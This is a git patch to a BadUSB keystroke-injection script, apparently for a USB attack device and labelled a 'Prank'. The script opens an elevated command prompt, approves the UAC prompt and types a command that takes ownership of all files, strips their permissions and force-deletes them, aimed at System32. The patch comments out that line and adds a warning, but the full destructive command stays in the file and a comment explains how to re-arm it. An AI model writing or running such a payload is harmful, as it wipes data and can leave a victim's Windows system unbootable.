From ac7e4eadd46210dbf438c682342c71f920fcb55a Mon Sep 17 00:00:00 2001 From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com> Date: Mon, 8 Aug 2022 14:16:18 -0700 Subject: [PATCH] Added bigger warning and "disarmed" script --- BadUSB/32_wants_the_D.txt | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/BadUSB/32_wants_the_D.txt b/BadUSB/32_wants_the_D.txt index 2d2a9d0e..27383e8d 100644 --- a/BadUSB/32_wants_the_D.txt +++ b/BadUSB/32_wants_the_D.txt @@ -5,6 +5,11 @@ REM Props: Hak5, my friends and memes REM Version: 1.0 REM Category: Prank REM D as in DELETE! Deletes System32. +REM +REM THIS WILL DELETE THINGS AND MAKE COMPUTER UNHAPPY +REM Uncomment out the string below to arm the script. +REM Also... don't be a dick to n00bs. =) +REM DELAY 500 GUI r DELAY 500 @@ -13,5 +18,5 @@ CTRL-SHIFT ENTER DELAY 2000 ALT y DELAY 1500 -STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q * +REM STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q * ENTER